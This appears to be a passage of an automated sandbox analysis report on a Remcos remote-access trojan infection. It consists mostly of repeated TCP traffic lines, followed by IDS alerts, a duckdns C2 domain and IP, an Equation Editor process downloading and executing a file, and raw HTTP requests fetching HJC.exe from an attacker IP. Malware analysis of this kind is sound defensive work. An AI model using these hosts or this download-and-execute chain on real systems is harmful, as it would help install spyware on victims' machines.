                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49170 -> 103.186.117.100:1166
                        Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 103.186.117.100:1166 -> 192.168.2.22:49170
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: uckdns.org
                        Uses dynamic DNS services
                        Source: unknownDNS query: name: kenoss.duckdns.org
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324C8AC InternetCheckConnectionA,5_2_0324C8AC
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540451 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540451
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 103.186.117.100:1166
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 06:41:52 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 22 Apr 2024 08:30:20 GMTETag: "190400-616ab3f81c82f"Accept-Ranges: bytesContent-Length: 1639424Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 68 05 00 00 98 13 00 00 00 00 00 c0 75 05 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 19 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 10 17 00 78 00 00 00 00 e0 16 00 66 20 00 00 00 b0 17 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 17 00 28 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 08 66 05 00 00 10 00 00 00 68 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 47 11 00 00 80 05 00 00 48 11 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 5d 0d 00 00 00 d0 16 00 00 00 00 00 00 b4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 66 20 00 00 00 e0 16 00 00 22 00 00 00 b4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 78 00 00 00 00 10 17 00 00 02 00 00 00 d6 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 74 6c 73 00 00 00 00 10 00 00 00 00 20 17 00 00 00 00 00 00 d8 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 30 17 00 00 02 00 00 00 d8 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 28 63 00 00 00 40 17 00 00 64 00 00 00 da 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 c6 01 00 00 b0 17 00 00 c6 01 00 00 3e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 80 19 00 00 00 00 00 00 04 19
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                        Source: Joe Sandbox ViewASN Name: NXGNET-AS-APNextgenNetworksAU NXGNET-AS-APNextgenNetworksAU
                        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                        Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                        Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                        Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                        Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                        Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                        Source: global trafficHTTP traffic detected: GET /360/HJC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.198.26.173Connection: Keep-Alive
